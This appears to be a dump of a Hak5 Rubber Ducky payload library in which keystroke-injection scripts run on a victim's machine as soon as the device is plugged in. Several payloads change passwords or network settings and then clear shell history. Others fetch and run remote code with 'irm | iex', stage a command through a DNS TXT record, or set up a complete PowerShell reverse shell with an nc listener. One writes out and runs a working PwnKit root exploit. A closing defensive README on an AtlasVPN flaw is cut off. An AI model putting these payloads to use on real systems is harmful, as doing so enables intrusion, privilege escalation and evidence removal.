" }, { "path": "payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt", "content": "REM ##############################################\nREM # |\nREM # Title : Call Someone On An iPhone |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : iPhone |\nREM # |\nREM ##############################################\n\n\nREM Requirements:\nREM - The phone must be unlocked\n\nREM Tested on:\nREM - iPhone 14\nREM - iOS 16.4.1\n\nREM You need to change the name of the application according to the language you have on your phone.\nDEFINE #PHONE-APP-NAME example\nREM You must set the phone number to be called\nDEFINE #NUMBER example\n\nGUI SPACE\nDELAY 300\nSTRING #PHONE-APP-NAME\nENTER\nDELAY 1000\nBACKSPACE\nSTRING #NUMBER\nDELAY 500\nENTER\n" }, { "path": "payloads/library/execution/ChangeGitRemoteLink/README.md", "content": "# Change Remote Git Link\n\nThis script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.\n\nThis script turns out to be very useful for aviting data leaks between old cloned repositories and new online repositories.\n\nTo make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.\n\n## Payload.txt config - Windows 10/11 - Tested on Windows 11\n\n```DuckyScript\n DELAY 1000\n GUI r\n DELAY 1000\n STRING powershell\n ENTER\n DELAY 2000\n```\n\n## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04\n\n```DuckyScript\n DELAY 1000\n CTRL-ALT t\n DELAY 2000\n```\n\n\n## Dependencies\n\n* Internet Connection\n* git installed\n* Full path of the cloned repository\n* ExecutionPolicy Bypass\n\n## Settings\n\n- Full path of the local repository i.e. \"C:\\Users\\User\\Documents\\Repository1\"\n```DuckyScript\n DEFINE #FULL-PATH example\n```\n\n- Link from which updates are to be downloaded so the new repository the Repository2\n```DuckyScript\n DEFINE #NEW-GIT-LINK example.git\n```\n\n- REM Define the branch of the new repository Repository2, i.e. \"main\"\n```DuckyScript\n DEFINE #BRANCH example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/ChangeGitRemoteLink/payload.txt", "content": "REM ###########################################\nREM # |\nREM # Title : Change Remote Git Link |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10-11/Linux |\nREM # |\nREM ###########################################\n\nREM Requirements:\nREM - Internet Connection\nREM - git installed\nREM - Full path of the cloned repository\nREM - ExecutionPolicy Bypass if runned on Windows\n\nREM Full path of the local repository i.e. \"C:\\Users\\User\\Documents\\Repository1\"\nDEFINE #FULL-PATH example\n\nREM Link from which updates are to be downloaded so the new repository the Repository2\nDEFINE #NEW-GIT-LINK example.git\n\nREM Define the branch of the new repository Repository2, i.e. \"main\"\nDEFINE #BRANCH example\n\nDELAY 1000\nGUI r\nDELAY 1000\nSTRING powershell\nENTER\nDELAY 2000\n\nSTRINGLN cd #FULL-PATH\nDELAY 1000\nSTRINGLN git remote set-url origin #NEW-GIT-LINK\nDELAY 1000\nSTRINGLN git pull --force origin #BRANCH\nDELAY 1000\nSTRINGLN git reset --hard origin/#BRANCH\nDELAY 1000\n\nALT F4\n" }, { "path": "payloads/library/execution/ChangeMacAddress_Linux/README.md", "content": " \n# Change MAC Address\n\nA script used to change the MAC address on a Linux machine.\n\n**Category**: Execution\n\n## Description\n\nA script used to change the MAC address on a Linux machine.\n\nOpens a shell, get the network card name, set the new MAC address, erase traces.\n\n## Getting Started\n\n### Dependencies\n\n* Linux Permissions\n* Internet Connection\n\n### Executing program\n\n* Plug in your device\n\n### Settings\n\n* Set the sudo password\n* Change as you want the new MAC address\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/ChangeMacAddress_Linux/payload.txt", "content": "\nREM ###########################################\nREM # |\nREM # Title : Change Linux MAC Address |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Linux |\nREM # |\nREM ###########################################\n\nREM Requirements:\nREM - Permissions\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\n\nREM #### PERMISSIONS SECTION ####\n\n\nREM You need to know the sudo password and replace 'example' with this\nDEFINE SUDO_PASS example\n\nSTRING sudo su\nENTER\nDELAY 1000\nSTRING SUDO_PASS\nENTER\nDELAY 1000\n\n\nREM #### MAC SECTION ####\n\n\nREM net-tools command\nSTRING apt install net-tools\nENTER\nDELAY 2000\n\nREM Set here your preferred MAC, you can don't change it remaining with the default value\nDEFINE NEW_MAC FF:FF:FF:FF:FF:FF\n\nREM Get the net interface name\nSTRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')\nENTER\nDELAY 500\n\nSTRING ifconfig $INTERFACE down\nENTER\nDELAY 500\n\nSTRING ifconfig $INTERFACE hw ether \nSTRING NEW_MAC\nENTER\nDELAY 500\n\nSTRING ifconfig $INTERFACE up\nENTER\nDELAY 500\n\n\nREM #### REMOVE TRACES ####\n\n\nDELAY 2000\nSTRING history -c\nENTER\n\nREM Close shell\nSTRING exit\nENTER\n" }, { "path": "payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md", "content": " \n# Change Network Configuration\n\nA script used to change the network configuration on a Linux machine.\n\n**Category**: Execution\n\n## Description\n\nA script used to change the network configuration on a Linux machine.\n\nOpens a shel, get the network card name, set the network configuration, erase traces.\n\n## Getting Started\n\n### Dependencies\n\n* Linux Permissions\n\n### Settings\n\n* Set the sudo password\n* Change as you want the network configuration\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt", "content": "\nREM ###############################################\nREM # |\nREM # Title : Change Network Configuration |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Linux |\nREM # |\nREM ###############################################\n\nREM Requirements:\nREM - Permissions\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\n\nREM #### PERMISSIONS SECTION ####\n\n\nREM Required: You need to know the sudo password and replace 'example' with this\nDEFINE SUDO_PASS example\nSTRING sudo su\nENTER\n\nDELAY 1000\nSTRING SUDO_PASS\nENTER\nDELAY 1000\n\n\nREM #### IP SECTION ####\n\n\nREM net-tools command\nSTRING apt install net-tools\nENTER\nDELAY 2000\n\nREM Set network interface\nDEFINE IP 192.168.1.100\nDEFINE MASK 255.255.255.0\nDEFINE GATEWAY 192.168.1.1\n\nSTRING IP=\"\nSTRING IP\nSTRING \"\nENTER\nDELAY 500\nSTRING MASK=\"\nSTRING MASK\nSTRING \"\nENTER\nDELAY 500\nSTRING GATEWAY=\"\nSTRING GATEWAY\nSTRING \"\nENTER\nDELAY 500\n\nREM Get the net interface name\nSTRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')\nENTER\nDELAY 500\nSTRING ifconfig $INTERFACE $IP netmask $MASK up\nENTER\nDELAY 500\n\n\nREM #### REMOVE TRACES ####\n\n\nSTRING history -c\nENTER\nDELAY 500\n\nREM Close shell\nSTRING exit\nENTER\n" }, { "path": "payloads/library/execution/Change_Github_Profile_Settings/README.md", "content": "# Change Github Profile Settings\n\nThis script can be used to edit Github account settings speeding up the editing process.\n\nThe script will run a shell and open the default browser in `https://github.com/settings/profile` and close the powershell. When the page is open go to the profile settings TABing many times.\n\n**Category**: Execution\n\n## Getting Started\n\n### Dependencies\n\n* Internet connection\n* Logged in Github\n* PayloadStudio >= 1.3.1\n\n### Settings\n\n- Here you should define the new name\n\n ```DuckyScript\n [19] DEFINE #NAME example\n ```\n\n- Here you should define the new Biography\n\n ```DuckyScript\n [20] DEFINE #BIO example\n ```\n\n- Here you should define the custom pronouns\n\n ```DuckyScript\n [21] DEFINE #CUSTOM-PRONOUNS example\n ```\n\n- Here you should define the new personal website url\n\n ```DuckyScript\n [22] DEFINE #URL example\n ```\n\n- Here you should define the new social network links\n\n ```DuckyScript\n [23] DEFINE #SOCIAL-ACCOUNT-1 example\n [24] DEFINE #SOCIAL-ACCOUNT-2 example\n [25] DEFINE #SOCIAL-ACCOUNT-3 example\n [26] DEFINE #SOCIAL-ACCOUNT-4 example\n ```\n\n- Here you should define the new company\n\n ```DuckyScript\n [27] DEFINE #COMPANY example\n ```\n\n- Here you should define the new location\n\n ```DuckyScript\n [28] DEFINE #LOCATION example\n ```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/execution/Change_Github_Profile_Settings/payload.txt", "content": "REM_BLOCK\n###################################################\n# #\n# Title : Change Github Profile Settings #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Execution #\n# Target : Windows 10/11 #\n# #\n###################################################\nEND_REM\n\nREM Requirements:\nREM - Internet connection\nREM - Logged in Github\nREM - PayloadStudio >= 1.3.1\n\nREM You must set the new Profile Settings\nDEFINE #NAME example\nDEFINE #BIO example\nDEFINE #CUSTOM-PRONOUNS example\nDEFINE #URL example\nDEFINE #SOCIAL-ACCOUNT-1 example\nDEFINE #SOCIAL-ACCOUNT-2 example\nDEFINE #SOCIAL-ACCOUNT-3 example\nDEFINE #SOCIAL-ACCOUNT-4 example\nDEFINE #COMPANY example\nDEFINE #LOCATION example\n\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\n\nGUI r\nDELAY 500\nSTRINGLN powershell\nDELAY 500\n\nSTRINGLN Start-Process \"https://github.com/settings/profile\"; exit;\nREM It depends by the computer power and by the internet connection power\nDELAY 2000\n\nREPEAT 37 TAB\nSTRING #NAME\nREPEAT 4 TAB\nSTRING #BIO\nTAB\nREPEAT 4 DOWNARROW\nSTRING #CUSTOM-PRONOUNS\nTAB\nSTRING #URL\nTAB\nSTRING #SOCIAL-ACCOUNT-1\nTAB\nSTRING #SOCIAL-ACCOUNT-2\nTAB\nSTRING #SOCIAL-ACCOUNT-3\nTAB\nSTRING #SOCIAL-ACCOUNT-4\nTAB\nSTRING #COMPANY\nTAB\nSTRING #LOCATION\nREPEAT 4 TAB\nENTER\nDELAY 2000\nALT-F4\n" }, { "path": "payloads/library/execution/Change_Windows_User_Name/README.md", "content": "# Change Windows User Name\n\nThis script can be used to change the windows user name.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to change the windows user name.\n\nThe script opens the research app and go to User Accounts settings using the default path `Control Panel\\All Control Panel Items\\User Accounts`, then go to \"Change your account name\" option and set the new name, save it and close the app.\n\nIt is absurd that you can do so many things on windows without asking for permissions.\n\n### Dependencies\n\n* Set the new name that you want to set\n\n```DuckyScript\nDEFINE NEW_NAME example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Change_Windows_User_Name/payload.txt", "content": "REM #############################################\nREM # |\nREM # Title : Change Windows User Name |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM #############################################\n\nREM Requirements:\nREM - Nothing\n\nREM Note:\nREM - Payload tested on Windows 11 Eng \n\nREM Set the new name that you want to set\nDEFINE NEW_NAME example\n\nREM Open Windows research\nDELAY 2000\nGUI\nDELAY 1000\n\nREM Search and opern explorer app\nSTRING explorer\nENTER\nDELAY 1000\n\nREM Goto search bar and open User Accounts settings\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 500\nSTRING Control Panel\\All Control Panel Items\\User Accounts\nENTER\nDELAY 1500\n\nREM Goto \"Change you account name\"\nTAB\nDELAY 500\nENTER\nDELAY 500\n\nSTRING NEW_NAME\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 1000\nALT F4\n" }, { "path": "payloads/library/execution/Change_the_password_of_the_windows_user/README.md", "content": "# Change the password of the windows user\n\nThrough this script you will be able to change windows user's password super fast.\n\n**Category**: Execution\n\n## Description\n\nThrough this script you will be able to change windows user's password super fast.\n\nA PowerShell with administrator permissions is started, and through the use of the `net` command you can change the password without necessarily having to know the original password.\n\nIt is always very fascinating to see how many things you can do on Windows systems without needing to know the original password. As fascinating as it is disturbing.\n\n## Dependencies\n\n* Nothing (i know it's absurd)\n\n## Example\n\n- `STRINGLN Get-ExecutionPolicy -List`\n![](docs/1.png)\n\n- `STRINGLN Set-ExecutionPolicy Bypass`\n![](docs/2.png)\n\n- `STRINGLN Get-ExecutionPolicy -List`\n![](docs/3.png)\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt", "content": "REM ############################################################\nREM # |\nREM # Title : Change the password of the Windows user |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10-11 |\nREM # |\nREM ############################################################\n\nREM Requirements:\nREM - Nothing (i know it's absurd)\n\nREM You must define the new Windows user password\nDEFINE NEW_PASSWORD example\n\nDELAY 1000\nGUI x\nDELAY 500\nSTRING a\nDELAY 500\nLEFT_ARROW\nDELAY 500\nENTER\n\nDELAY 2000\nSTRING net user $env:USERNAME \nSTRING NEW_PASSWORD\nENTER\nDELAY 1000\n\nALT F4\n" }, { "path": "payloads/library/execution/CloseAllApplicationsInWindows/README.md", "content": "# Close All Applications - BADUSB ✅\n\nA script used to close all target open applications.\n\n🟢 **Plug-And-Play** 🟢\n\n**Category**: Execution\n\n## Description\n\nA script used to close all target open applications.\n\nOpens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.\n\n## Getting Started\n\n### Dependencies\n\n* Internet Connection\n* Windows 10,11\n\n### Settings\n\n- No settings - Plug-And-Play\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1", "content": "# Download Python script\n\n# Reply $scriptUrl with YOUR LINK. The Payload should be script.py\n$scriptUrl = \"YOUR_END_USER_LINK_WITH_PAYLOAD\"\n$savePath = \"$env:temp\\script.py\"\n(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)\n\n# Execute Python script\n& python $savePath\n\n# Delete the downloaded script\nRemove-Item $savePath\n\n# Clear the download history from the system's web cache\nRemove-Item -Path \"$env:LOCALAPPDATA\\Microsoft\\Windows\\WebCache\\*\" -Recurse -Force\n\n# Clear the PowerShell command history\nClear-History\n" }, { "path": "payloads/library/execution/CloseAllApplicationsInWindows/payload.txt", "content": "REM #####################################################\nREM # |\nREM # Title : Close All Applications |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10-11 |\nREM # |\nREM #####################################################\n\nREM Plug-And-Play\n\nREM \nREM 1. Open a powershell\nREM 2. Download a Python script\nREM 3. Execute it\nREM 4. Remove Python script downloaded\nREM 5. Delete powershell history\nREM\n\nREM Reply with YOUR LINK. The Payload should be close_all_app.ps1\nDEFINE POWERSHEL_CODE example.com\n\nDELAY 2000\nGUI x\nDELAY 250\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nDOWNARROW\nENTER\nDELAY 1000\nTAB\nTAB\nENTER\nDELAY 2000\nSTRING irm POWERSHEL_CODE | iex\nENTER\n" }, { "path": "payloads/library/execution/CloseAllApplicationsInWindows/script.py", "content": "try:\n import psutil\nexcept:\n import os\n os.system(\"pip install psutil\")\n import psutil\n\nfor process in psutil.process_iter():\n try:\n process.terminate()\n except:\n pass\n" }, { "path": "payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt", "content": "EXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nREM_BLOCK\nTitle: DNS-TXT-CommandInjection\nCONFIGURATION\nREQUIRED - Provide URL used for Example #MY_TARGET_URL\nNOTES: No base64 can be used as an alternative by replacing \"$a=\",\";powershell -e $a\" with just \"|iex\"\nfor the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.\nDecoded: \"irm http://MY_TARGET_URL/T1.txt | iex\"\nEncoded: \"aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==\"\nCreate TXT record in AWS Route53\nhttps://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method\nEND_REM\n\nDEFINE #MY_TARGET_URL example.com\nGUI r\nDELAY 500\nSTRINGLN powershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a\n" }, { "path": "payloads/library/execution/DNS-TXT-CommandInjection/README.md", "content": "# DNS-TXT-CommandInjection\nDucky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record. The payload leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. \n## Description\nAuthor: Nate\\\nTarget: Windows 10, 11\\\nProps: Hak5, Darren Kitchen, Korben\\\nVersion: 1.0\\\nCategory: Execution\n## Configuration\n1. A domain with the ability to manipulate the DNS TXT records.\n2. Add command to DNS TXT records. See Links for an example of creating your DNS TXT record in AWS Route53 service.\n3. Web Server hosting a file. In this example, python3 http.server was used to host a reverseshell.\n4. Update powershellReverseShellOne-liner.ps1.\n5. Set up istener on the attacker machine to reflect what is in powershellReverseShellOne-liner.ps1. Netcat was used in this example.\n6. Provide URL used for Example #MY_TARGET_URL in DNS-TXT-CommandInjection.txt\n## Notes\nOther commands can be added to DNS TXT record rather than the example below.\nNo base64 can be used as an option by replacing \"$a=\",\";powershell -e $a\" with just \"|iex\" for the STRINGLN payload. Examples of the decoded command and encoded command are shown below to put into the DNS TXT record.\n\nDecoded: \"irm http://MY_TARGET_URL/T1.txt | iex\"\\\nEncoded: \"aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==\"\n\npowershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)\\\nShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.\n## Windows Commands (used in payload)\n### Execute DNS TXT Payload\n```Powershell\npowershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a\n```\n### Execute web hosted Powershell Reverseshell\n```Powershell\nirm http://MY_TARGET_URL/T1.txt | iex\n```\n## Linux Commands\n### Web Server to host a file\n```Bash\npython3 -m http.server 80\n```\n### Netcat listener\n```Bash\nnc -lvnp 1337\n```\n### Links\n\n[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)\n\n[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)\n" }, { "path": "payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1", "content": "# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html\n# CONFIGURATION\n# REQUIRED - Provide IP and Port used for Example\n# REQUIRED - MY_TARGET_IP and Port after TCPClient( \n$client = New-Object System.Net.Sockets.TCPClient('MY_TARGET_IP',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex \". { $data } 2>&1\" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n" }, { "path": "payloads/library/execution/DUCKY_REAPER/payload.txt", "content": "REM Title: DUCKY_REAPER\nREM Author: JonnyBanana\nREM Requirements -none\nREM How it works?\nREM The script is a One-Liner and call an html page with a css webkit filter attack inside, this webpage crash the system ...\nREM webpage with the exploit here: https://github.com/JonnyBanana/safari-ie-reaper.github.io\nREM the script have 3 version (2 for windows and 1 for mac os)\nREM all payloads here: https://github.com/JonnyBanana/DUCKY_REAPER\nDELAY 2000\nGUI R \nDELAY 500\nSTRING iexplore https://jonnybanana.github.io/safari-ie-reaper.github.io\nDELAY 500\nENTER\n" }, { "path": "payloads/library/execution/DawnKit/payload.txt", "content": "REM Title: pwnKit\nREM Description: Privilege escalation in Unix-like operating systems\nREM Author: drapl0n\nREM Version: 1.0\nREM Category: Privilege Escalation\nREM Target: Unix-like operating systems\nREM Attackmodes: HID\n\nDELAY 1000\nCTRL-ALT t\nDELAY 1000\nSTRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nDELAY 400\nSTRING mkdir /tmp/pwn && cd /tmp/pwn\nENTER\nDELAY 400\nSTRING echo -e '\"CFLAGS=-Wall\\nTRUE=$(shell which true)\\n\\n.PHONY: all\\nall: pwnkit.so cve-2021-4034 gconv-modules gconvpath\\n\\n.PHONY: clean\\nclean:\\n\\trm -rf pwnkit.so cve-2021-4034 gconv-modules GCONV_PATH=./\\n\\tmake -C dry-run clean\\n\\ngconv-modules:\\n\\techo \"module UTF-8// PWNKIT// pwnkit 1\" > $@\\n\\n.PHONY: gconvpath\\ngconvpath:\\n\\tmkdir -p GCONV_PATH=.\\n\\tcp -f $(TRUE) GCONV_PATH=./pwnkit.so:.\\n\\npwnkit.so: pwnkit.c\\n\\t$(CC) $(CFLAGS) --shared -fPIC -o $@ $<\\n\\n.PHONY: dry-run\\ndry-run:\\n\\tmake -C dry-run\"' > Makefile\nENTER\nDELAY 400\nSTRING echo -e \"#include \\n\\nint main(int argc, char **argv)\\n{\\n\\tchar * const args[] = {\\n\\t\\tNULL\\n\\t};\\n\\tchar * const environ[] = {\\n\\t\\t\"\\\"pwnkit.so:.\\\"\",\\n\\t\\t\"\\\"PATH=GCONV_PATH=.\\\"\",\\n\\t\\t\"\\\"SHELL=/lol/i/do/not/exists\\\"\",\\n\\t\\t\"\\\"CHARSET=PWNKIT\\\"\",\\n\\t\\t\"\\\"GIO_USE_VFS=\\\"\",\\n\\t\\tNULL\\n\\t};\\n\\treturn execve(\"\\\"/usr/bin/pkexec\\\"\", args, environ);\\n}\" > cve-2021-4034.c\nENTER\nDELAY 400\nSTRING echo -e \"\"'#!/usr/bin/env sh\\n\\nURL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'\\n\\nfor EXPLOIT in \"${URL}/cve-2021-4034.c\" \"${URL}/pwnkit.c\" \"${URL}/Makefile\"\\ndo\\n\\tcurl -sLO \"$EXPLOIT\" || wget --no-hsts -q \"$EXPLOIT\" -O \"${EXPLOIT##*/}\"\\ndone\\n\\nmake\\n\\n./cve-2021-4034'\"\" > cve-2021-4034.sh\nENTER\nDELAY 400\nSTRING echo -e \"#include \\n#include \\n#include \\n\\nvoid gconv(void) {\\n}\\n\\nvoid gconv_init(void *step)\\n{\\n\\tchar * const args[] = { \"\\\"/bin/sh\\\"\", NULL };\\n\\tchar * const environ[] = { \"\\\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin\\\"\", NULL };\\n\\tsetuid(0);\\n\\tsetgid(0);\\n\\texecve(args[0], args, environ);\\n\\texit(0);\\n}\" > pwnkit.c\nENTER\nDELAY 200\nSTRING make && ./cve-2021-4034\nENTER\nDELAY 4000\nSTRING rm -rf /tmp/pwn\nENTER\n" }, { "path": "payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/README.md", "content": "# Defend yourself against AtlasVPN *Bug-Door*\n\nThis script has been developed to allow you to mitigate a well-known vulnerability in the AtlasVPN client based on its APIs, which, as of today, has not been resolved. The term \"bugdoor\" has been coined to describe this situation, as the bug has been reported multiple times without being addressed, effectively creating an open backdoor (bug + backdoor).\n\n**Category**: Incident Response\n\n![](1.png)\n\n## Table of contents:\n\n- Payload description\n- AtlasVPN vulnerability\n- - Summary\n- - Dependencies\n- Settings\n- - Administrative Privileges\n- - Set the rule\n- - See the rule\n- - Remove the rule\n- Credits\n\n## Payload description\n\nThis payload arises from the need to address a 0day vulnerability, which is now reasonable to assume has been known for mounths (maybe years), within the Linux client of AtlasVPN version 1.0.3. This vulnerability leads to a leakage of the user's real IP address, a situation that typically requires a prompt response from the company to provide a resolution patch and mitigate potential attacks.\n\nHowever, in this case, the user who discovered the vulnerability had already proactively informed and reported it to the company in question. Surprisingly, up to this point, the company has not only failed to release any patches but has also not made any statements regarding the issue. This raises serious doubts about the nature of the problem, prompting questions (as highlighted by the vulnerability reporter) about the possibility that it might be an intentional bug or a deliberate backdoor, given that it is such a trivial error that it is absurd it hasn't been addressed proactively.\n\nIt's important to emphasize that these considerations represent personal opinions based on the original 0day report's message and should encourage discussions about cybersecurity and the reliability of the VPN service offered. If the company decides to provide a patch, it should also be required to explain the reason behind this prolonged negligence.\n\n## AtlasVPN vulnerability\n\nFrom [AtlasVPN Linux Client 1.0.3 Remote Disconnect Exploit](https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/)\n\n> The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.\n\n### Summary\n\n> The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.\n\nThe exploit code will not be included in this payload, as the primary goal here is defensive, not offensive. It's important to note that it's relatively easy to find a fully functional Proof of Concept (POC) for this vulnerability online if you need it for vulnerability testing purposes.\n\n### Dependencies\n\nSource [1]: https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/\n\nSource [2] (Italian article): https://www.redhotcyber.com/post/ce-poco-da-nascondersi-il-bug-sul-client-di-atlas-vpn-rende-tutti-visibili/\n\n## Settings\n\nIn order to mitigate this critical vulnerability, it is imperative to understand its operation at a more detailed level. 